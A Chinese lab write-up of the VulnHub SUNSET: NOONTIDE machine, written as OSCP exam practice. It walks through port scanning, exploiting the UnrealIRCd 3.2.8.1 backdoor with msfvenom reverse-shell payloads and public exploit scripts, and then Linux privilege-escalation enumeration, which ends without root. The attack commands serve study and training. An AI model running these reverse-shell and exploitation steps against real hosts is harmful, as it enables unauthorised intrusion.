靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE

这篇具有很好参考价值的文章主要介绍了靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

打靶思路

  1. 资产发现

    1. 主机发现

    2. 服务发现

  2. 漏洞发现(获取权限)

    1. irc服务

  3. 提升权限

    1. server用户

      1. sudo

      2. suid

      3. cron

      4. 内核提权

      5. 信息收集

1、资产发现

1.1、主机发现

本次靶场SUNSET: NOONTIDE[1]指定IP,不涉及主机发现过程。

1.2、服务发现

使用命令sudo -u root 172.16.33.78 -n -Pn -p- --reason -sV -sC -O,发现主机开放的端口、提供的服务、使用的组件、组件的版本。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

开放的端口

提供的服务

使用的组件

组件的版本

6667/tcp

irc

UnrealIRCd

?

6697/tcp

irc

UnrealIRCd

?

8067/tcp

irc

UnrealIRCd

?

-

os

?

?

2、漏洞发现(获取权限)

2.1、irc服务

0x01

主机只使用UnrealIRCd组件提供irc服务,看来要么从这突破,要么放弃。使用命令searchsploit UnrealIRCd,发现3.2.8.1版本的UnrealIRCd组件存在RCE漏洞。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

查看Metasploitable2系列练习-漏洞利用之UnrealIRCd[2],得知可以使用hexchat查看UnrealIRCd组件的版本。使用命令sudo apt-get install -y hexchat安装hexchat,使用命令hexchat 172.16.33.78连接irc服务,发现UnrealIRCd组件的版本刚好就是存在RCE漏洞的3.2.8.1。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

0x02

使用命令searchsploit -m 13853将EXP拷贝到当前目录。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

使用命令msfvenom -p cmd/unix/reverse_perl LHOST=10.8.0.110 LPORT=4444 -f raw创建perl环境的Payload。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

使用命令vim 13853.pl将Payload添加到EXP中,注意引号的转义和结尾的分号。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

使用命令nc -nvlp 4444监听反弹shell,使用命令perl 13853.pl 172.16.33.78 <端口> 1利用RCE漏洞发起反弹shell,均未获得反弹shell,难道目标机器上没有perl环境?

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

0x03

使用命令msfvenom -p cmd/unix/reverse_bash LHOST=10.8.0.110 LPORT=4444 -f raw创建bash环境的Payload。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

使用命令vim 13853.pl将Payload添加到EXP中,注意引号的转义和结尾的分号。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

使用命令nc -nvlp 4444监听反弹shell,使用命令perl 13853.pl 172.16.33.78 <端口> 2利用RCE漏洞发起反弹shell,均未获得反弹shell,难道是EXP不行?

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

0x04

网上找到EXPRanger11Danger/UnrealIRCd-3.2.8.1-Backdoor/exploit.py[3],使用命令vim exploit.py修改本地监听的IP和端口后,使用命令python3 exploit.py -payload <脚本语言> <目标IP> <目标端口>构造命令进行利用,最终使用python3 exploit.py -payload bash 172.16.33.78 6697成功获得反弹shell。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

0x05

网上找到EXPgeek-repo/UnrealIRCd-3.2.8.1/poc.py[4],使用命令vim poc.py修改源目IP端口后,构造命令python2 poc.py进行利用,最终成功获得server用户的反弹shell。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

3、提升权限

首先使用命令which pythonwhich python3发现有Python3环境,然后使用python3 -c 'import pty; pty.spawn("/bin/bash")'获得交换式shell。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

3.1、server用户

3.1.1、sudo

使用命令sudo -l查看当前用户能以谁的权限执行什么命令,发现不存在sudo命令。使用命令which sudo确认确实不存在。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

3.1.2、suid

使用命令find / -perm -u=s -type f -ls 2>/dev/null查看哪些命令在执行时会以命令属主的权限执行,发现还挺多。逐个在GTFOBins[5]查询是否可用于提权,发现都不行。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

3.1.3、cron

使用命令find /var/spool/cron/ -type f -ls 2>/dev/null查看定时任务,发现没有。使用命令find /var/spool/cron/ -type f -ls不隐藏报错,发现是没有查看权限。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

使用命令find /etc/*cron* -type f -ls查看定时任务,发现还挺多。使用命令find /etc/*cron* -type f -ls 2>/dev/null -exec cat {} \; > /tmp/cron.txtgrep '\*' /tmp/cron.txt查看定时任务内容,未发现有引用当前用户具有read和write权限的命令或脚本。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

使用命令find / -perm -o=rw ! -path "/proc/*" -type f -ls 2>/dev/null查看other用户具有read和write权限的命令或脚本,发现有一些,但未发现有可能被定时任务引用的迹象。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

3.1.4、内核提权

使用命令uname -r获取系统内核版本4.19.0,使用命令cat /etc/*release获取系统发行版本Debian Linux 10

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

使用命令searchsploit 4. Debian Linux 10,未发现存在本地提权漏洞。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

3.1.5、信息收集

使用命令find /root/ -type f -ls 2>/dev/null查看特权用户目录下的文件,无收获。使用命令find /home/ ! -path "/home/server/irc/*" -type f -ls 2>/dev/null查看普通用户目录下的文件,无收获。使用命令find /tmp/ -type f -ls 2>/dev/null查看临时目录下的文件,无收获。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

查看irc服务的配置文件和日志文件,最终在/home/server/irc/Unreal3.2/ircd.log中发现连接记录Connect - root!root@192.168.100.139,疑似获得账户密码root/root,不过使用命令su root切换到root账户时却报错,看来密码被改过了。但是查看WriteUp,确实又是使用账户密码root/root获得提权的,看来这靶机有问题呀。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

3.1.6、使用工具

靶机使用命令nc -nvlp 4444 > /tmp/linpeas.sh接收文件,本地使用命令nc -nv 172.16.33.78 4444 < linpeas.sh发送文件后使用命令Ctrl+C关闭连接,靶机使用命令chmod +x /tmp/linpeas.sh赋予脚本执行权限后使用命令/tmp/linpeas.sh执行脚本。逐个查看脚本报告,未发现可以提权的漏洞,提权失败。

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE,网络,服务器,linux,安全,运维

参考资料

[1]

SUNSET: NOONTIDE: https://www.vulnhub.com/entry/sunset-noontide,531/

[2]

Metasploitable2系列练习-漏洞利用之UnrealIRCd: https://chujian521.github.io/blog/2020/04/28/Metasploitable2系列练习-漏洞利用之UnrealIRCd/

[3]

Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/exploit.py: https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/blob/master/exploit.py

[4]

geek-repo/UnrealIRCd-3.2.8.1/poc.py: https://github.com/geek-repo/UnrealIRCd-3.2.8.1

[5]

GTFOBins: https://gtfobins.github.io文章来源地址https://www.toymoban.com/news/detail-786816.html

到了这里,关于靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • breach-1--vulnhub靶场

    一、环境搭建 下载靶场Breach: 1 ~ VulnHub 描述 VM 配置了静态 IP 地址 (192.168.110.140),因此需要将仅主机适配器配置到此子网。 网络设置也可用其他模式 网络模式:NAT 靶机地址: 192.168.110.140 kali地址:192.168.110.128 二、信息收集 (1)nmap 端口扫描 所有端口都开放,应该是对扫

    2024年02月15日
    浏览(41)
  • 【VulnHub靶场】——CHRONOS: 1

    作者名:Demo不是emo  主页面链接 : 主页传送门 创作初心: 一切为了她 座右铭: 不要让时代的悲哀成为你的悲哀 专研方向: 网络安全,数据结构 每日emo: 要做个明亮的人,要有个珍藏的故事,要看遍山河日落,要不虚此行。  从10月中旬开始制定了 为期24周的打靶训练

    2024年02月09日
    浏览(33)
  • Vulnhub之Lazysysadmin靶场

    目录 一. 环境搭建 二. 渗透过程 1. 信息收集 1.1主机发现 1.2端口扫描 1.3目录扫描 2. 信息漏洞利用 2.1靶机目录信息搜集: 3. Getshell 3.1ssh弱口令 3.2信息收集 4. 提权 5.*反推,其他思路* 5.1提权后的信息收集: 总结 Lazysysadmin靶场下载: https://download.vulnhub.com/lazysysadmin/Lazysysadmin

    2023年04月09日
    浏览(41)
  • vulnhub covfefe靶场

    目录 1.信息收集 2.资源分析 3.漏洞利用 4.提升权限 扫描出多个IP nmap只发现192.168.42.146有端口开放,为22,80,31337 扫描192.168.42.146的22,80,31337端口,看看开放的服务 用dirb找找目录 查看robots.txt,寻找目录 访问taxes,拿到flag1 进入ssh目录,下载rsa,pub 下载了ssh的公钥和私钥,开放

    2024年02月05日
    浏览(31)
  • vulnhub靶场搭建

    sudo apt install docker.io 3、验证安装 docker-v 4、安装docker-compose pip install docker-compose 5、拉取镜像 git clone https://github.com/vulhub/vulhub.git 6、进行测试 cd vulnhub docker-compose up -d 7、your-ip 换自己的IP 8、使用完后卸载 docker-compose down -d 步骤如上。。。 在调试过程中 在WSL2的Ubuntu上遇到此错

    2024年02月10日
    浏览(34)
  • vulnhub DC-9靶场

    目录 1.信息收集 2.漏洞发掘 3.横向渗透 4.提升权限 4.1构造用户行,写入/etc/passwd 4.2构造权限行,写入/etc/sudoers 扫描主机 sudo arp-scan -l 扫描端口,发现只有80端口 nmap -p- 192.168.42.150 扫描80开放的服务 nmap -p 80 -A -V 192.168.42.150 访问主页面 发现有查找功能,猜测此处有sql注入漏洞 测

    2024年02月05日
    浏览(34)
  • vulnhub DC-1靶场

    目录 1.扫描主机 2.得到shell(2.1,2.2)只用一种即可 2.1开始msf漏洞利用 2.2脚本exp得到反弹shell 3.开始提权 sudo arp-scan -l 扫描端口 nmap -p- 192.168.42.147 扫描主机指纹,发现Drupal 7 cms mfconsole search drupal search 7600 use exploit/unix/webapp/drupal_drupalgeddon2 set rhosts 192.168.42.147 run 看到这个,说

    2024年02月05日
    浏览(41)
  • vulnhub DC-4靶场

    目录 1.信息收集 2.漏洞利用 3.横向渗透 4.提升权限 搜索到ip sudo arp-scan -l 查看ip开放端口 nmap -p- 192.168.42.148 查找指纹,没有收获 查找目录,无敏感信息 访问网站,发现只有登录框,猜测为弱密码或密码爆破 bp爆破成功(为了节省时间,我假设知道username,爆破真的太慢了)

    2024年02月05日
    浏览(86)
  • vulnhub DC-5靶场

    目录 1.信息收集 2.网站分析 3.漏洞利用 4.提升权限 扫描主机 sudo arp-scan -l 扫描端口 nmap -p- 192.168.42.149 扫描指纹 whatweb 192.168.42.149 查看端口详细服务 nmap -A -p- -v 192.168.42.149 扫描目录 dirbuster 浏览网站,发现都是静态页面 只有contact.php有上传窗口 尝试上传,发现问题copyright旁的

    2024年02月05日
    浏览(35)
  • 【VulnHub靶场】Hackable: III

    在找到目标靶机后,我们首先使用nmap工具来进行初步的信息收集 Command used: nmap -sV -p- 192.168.31.180 通过扫描我们可以得知80端口是开启状态,访问后得到以下界面 查看其源代码 我们可以得到一条注释 “Please, jubiscleudo, don’t forget to activate the port knocking when exiting your section, an

    2023年04月09日
    浏览(26)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包